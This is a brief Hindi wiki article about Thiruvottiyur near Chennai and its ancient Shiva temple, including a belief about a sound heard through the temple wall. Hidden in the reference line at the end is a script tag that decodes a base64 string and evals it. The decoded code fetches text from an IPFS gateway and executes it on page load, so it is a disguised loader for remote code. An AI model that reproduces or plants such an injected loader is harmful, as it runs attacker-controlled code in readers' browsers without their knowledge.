तिरुवत्तियूर

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

तिरुवत्तियूर दक्षिण भारत के तमिलनाडु राज्य की राजधानी चेन्नई शहर (भूतपूर्व मद्रास) से 8 मील दूर एक छोटा कस्बा है। यह प्राचीन हिन्दू धार्मिक स्थल है। यहाँ विशाल घेरे के मध्य आदि पुरीश्वर शिव मंदिर है। उसके द्वार के समीप त्रिपुर सुंदरी का मंदिर है। चेन्नई से यहाँ तक मोटर बसें आती हैं।

चेन्नई शहर के बसने से पहले का यह मंदिर है। यहाँ एक स्थान पर मंदिर की दीवार से कान लगाने पर एक प्रकार की ध्वनि सुनाई पड़ती है। लोगों का विश्वास है कि यहाँ अदृश्य रहकर भजन करने वाले किसी ऋषि की यह जय ध्वनि है।


टीका टिप्पणी और संदर्भ

हिन्दूओं के तीर्थ स्थान |लेखक: सुदर्शन सिंह 'चक्र' |पृष्ठ संख्या: 100 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

संबंधित लेख